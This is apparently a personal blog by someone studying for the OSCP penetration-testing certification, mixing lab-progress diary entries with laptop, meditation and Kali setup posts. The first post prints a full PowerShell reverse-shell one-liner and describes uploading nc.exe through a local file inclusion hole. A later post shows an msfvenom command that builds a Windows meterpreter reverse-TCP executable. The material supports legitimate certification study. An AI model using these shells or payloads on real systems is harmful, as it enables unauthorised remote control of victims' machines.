RCE using LFI attacks – happy St. Patty’s Day!

Top of the mornin’ to ya…

I like to wake up early to study. I mean, really early. Like today, I woke up at 3:30 am today to tackle this issue of gaining remote code execution (RCE) using Local File Inclusion attacks (LFI). I was hanging out at a coffee shop till pretty late last night, and couldn’t get it. This AM, I realized a few mistakes in my URL and it looked like I was able to upload nc.exe to the victim machine using tftp. Once I did this, I could execute nc.exe to call back to my machine.

This got me thinking a bit though, and I started wondering if I didn’t have tftp on my vulnerable windows box. So I looked up a few reverse shells here, but most of them were built for a victim linux machine (i.e. bash commands).

I found one that supposedly works with a powershell command:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

I also need to think a bit about this. I need to explore more about how to execute a command on a remote machine that would send a shell to my attacking machine (reverse shells, son). Ippsec’s channel is a go-to for a lot of this.

If I don’t have tftp to upload nc.exe on an LFI through php or another web application code, then I would need to get the reverse shell to work on one command – thought that PS would do it, but nada. Ippsec actually had trouble with this too on bashed, so actually, that means I might be doing it right.

Listening to Irish gigs right now – takes me back when I went to Ireland with my wife.

Sl√°inte!

…and I just extended my lab time.

This is a journey folks. And my journey includes a kid and a full time job. So right now, I am hanging around Chapter 13, Local File Inclusion vulnerabilities, and in order to pop 10 boxes and finish the labs, I am going to need the extra time.

One of things that they say in the exercise is that they quote Lincoln – “Give me six hours to chop down a tree and I will spend the first four sharpening the ax”. I think I just need a few more days, not hours, to sharpen. ūüôā

It’s a little tricky, and I really like how OffSec trains you in the labs to think about the cracks. Those cracks that can get you to root on a box. Off to LFIs!

Day 53 of the OSCP!!

I am slow – like really slow. I got through the enumeration section of the book pretty steadily, but now that I am working on Buffer Overflows, things are going slow and I am not as “quick” to pick back up the book.

I wake up at 4 am every day eager to study. After checking emails and reddit, I get in and make a little bit of progress. I really have to start putting more of my heart into this or else this OSCP is going to drag…

People take the test, what, like three times before they pass? I really need to get more wrapped in it, or this is going to be a really long process. I think I am going to buy 90 more days of lab to finish out the book, and then just go nuts on studying through hackthebox.eu and vulnhub. Take the test at the latest I can take it, and then if I fail, maybe 30 more days of lab and studying and then take it again.

I have a baby boy due in July so, yeah…. life happens, but it has always been my passion to pass this cert. I got this. Wish me luck.

I love meditation ūüĎĀÔłŹ‚̧ԳŹūüßė

Merry Christmas interwebs! Well, one day late, but still – and keep in mind that is the Catholic Christmas, not the Orthodox Christmas, which we will celebrate with my wife’s family on January 7th, 2019. So merry in-between Christmas???

There are a few things I love, and meditation is one of them. I can’t highlight how amazing it is – and with apps like Headspace, you really can’t go wrong. There is so much importance in the need for us to appreciate the present. I think when we train our minds on being present and aware, we appreciate life and the people around us. I am currently working through headspace on their Kindness pack but there are so many different types of packs, from mindful eating to taking a walk in the park.

I am on day 11 of my OSCP and the more I read about the test, and what it involoves, the more I realize that 90 days may get me to where I need, but I have to study. So my goal is 3 hours/day weekdays, 6-8 hours/day weekends. I think if I just inviest the time and energy, it’s possible. The OSCP is becoming the de-facto standard in Pen Testing, and I really want to get it. It would be such a confidence lifter for me.

Happy Wednesday, and press on.

Finally landed on the Surface Laptop 2

Well, the Matebook¬†X Pro didn’t fair well to a dual boot with Kali and Windows.¬† ¬†I think it had something to do with the weird 3000×2000 resolution and the fact that grub couldn’t understand that to boot into an installer for Kali.¬† I tried working on different grub commands, but eh, I did so much that I couldn’t get the machine to boot back into the original install.

So I took it back to the store and decided VM only – no dual booting.¬† I mean, OSCP is set up to work within a VM, all my practice¬†books are with VMs.¬† So VM it is – and I need a good supported VM app, so Windows with VMWare Workstation was the way to go.¬† I also wanted a laptop that will last, so I put¬†up the extra cash for the new Surface Laptop 2.¬† I am happy so far.¬† I do wish it has a USB-C as the MXP did, but it wasn’t a deal breaker.¬† Back to studying!

Happy Monday!

Currently listening to Desi, waiting for my new USB stick to finish a slow format.¬† So I have been using my wife’s computer to start prepping for the OSCP, and I have to say, that was a bad idea.¬† I have a mac, but trying to create my own virtual lab in there has been rough.¬† I used VirtualBox¬†to do this, but VMWare workstation on a windows machine just seems to get the job done right.

So, my first thought was to go with a souped-up Chromebook.¬† I went ahead and got the i7 Pixelbook.¬† Nice looking machine, and yes, I think ChromeOS is nice – but I wanted to run Linux off of it.¬† So I went two different routes on this, and both didn’t work like I needed it to.

Route 1:¬† I changed my channel to the developer channel and just used the crostini linux¬†that google offered from this channel.¬† It wasn’t a full blown linux¬†like I needed.¬† So scratch that.

Route 2: I put the Pixelbook in developer mode, and ran chroots of linux.¬† After some crazy finagling, I got kali-rolling on a xfce¬†desktop.¬† But, still limited – for example, I couldn’t do any networking – this was just a virtual container running on ChromeOS.

I didn’t try wiping the OS and just installing a linux¬†on metal.¬† Mainly because I was afraid that doing that would lock me into not being able to return the machine.¬† After not being able to successfully do either of the above routes, I put the machine back on the stable channel, main mode, and powerwash.

I haven’t gotten my $ back (it’s still in the mail), but I need a machine that is not my wife’s.¬† Some googling commenced, and I settled on a Matebook¬†X Pro (MXP).¬† I think it’s the best bang for your buck.¬† I almost bought a Surface Book 2, but it was clunky, and $1K more.¬† I don’t really need a 2-in-1.¬† The only thing about the MXP¬†is the resolution is a bit wack.¬† It works, but it’s like 3000×2000 – and then you have to increase the font size.¬† So far, ok, but some of my older Vms¬†(windows 7, XP, Ubuntu) are hard to see/really small.¬† But the ports, the size, and the power of the computer I really like.¬† I am a bit concerned about the build – Chinese products sometimes don’t last as long, and I am hoping this will take me 5 years out.¬† But I hope that I am done with my OSCP at that time, and might be time for a new PC, based on what I learned.

I am going to set up a dual boot on Kali and Windows.¬† The drive is a 512MB SSD and so far, all is well, except for the heat – the computer does come with a 1 year warranty, so I am going to lean on that if something doesn’t go well.

msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.1.49 LPORT=12345 -f exe > chapter4example.exe

…That’s not working either.¬† The output I am getting is:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload

No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes Final size of exe file: 73802 bytes

I think I am going to keep on going….. and it looks like the multi/handler module isn’t working either.¬† I’ll come back to this as well.

Data Manipulation and Netcat

Just got done with chapter 2.¬† Yeah, 17 days later.¬† Oh well…

The 2nd chapter for me was a bit of a regurgitation of basic Linux commands, other than a few Data Manipulation commands:

  • sed – this command is ideal for editing files based on certain patterns or expressions
  • awk – another pattern matching tool, but more robust

…and the book talks about Netcat.¬† Now we are working with networking.

Glad to back on the train.

dhclient and restarting smbd

When I installed Kali 2018.2, after bridging the network in VMWare, I wasn’t able to get to the network.¬† Through a Kali udemy¬†course, I learned two commands that have been working for me in not only Kali, but other Linux machines to get an ip¬†address and bridge the connection.¬† In Kali, you are root, so I didn’t need¬†sudo.¬† If you are using a different user, you will need to¬†sudo to run the commands (with the exception of¬†ifconfig):

  • ifconfig

With ifconfig, look to see what your interface is (eth0, eth1).  Mine is eth0 in Kali, so I wil use that for the next command

  • dhclient¬†eth0

DHCP Client, dhclient, provides a means for configuring one or more network interfaces using the Dynamic Host Configuration Protocol, BOOTP protocol, or if these protocols fail, by statically assigning an address.

  • service smbd¬†restart

smbd is the server daemon that provides filesharing and printing services to Windows clients. The server provides filespace and printer services to clients using the SMB (or CIFS) protocol. This is compatible with the LanManager protocol, and can service LanManager clients. These include MSCLIENT 3.0 for DOS, Windows for Workgroups, Windows 95/98/ME, Windows NT, Windows 2000, OS/2, DAVE for Macintosh, and smbfs for Linux

Now try pinging google:

  • ping 8.8.8.8

You should be connected now.  Whoo!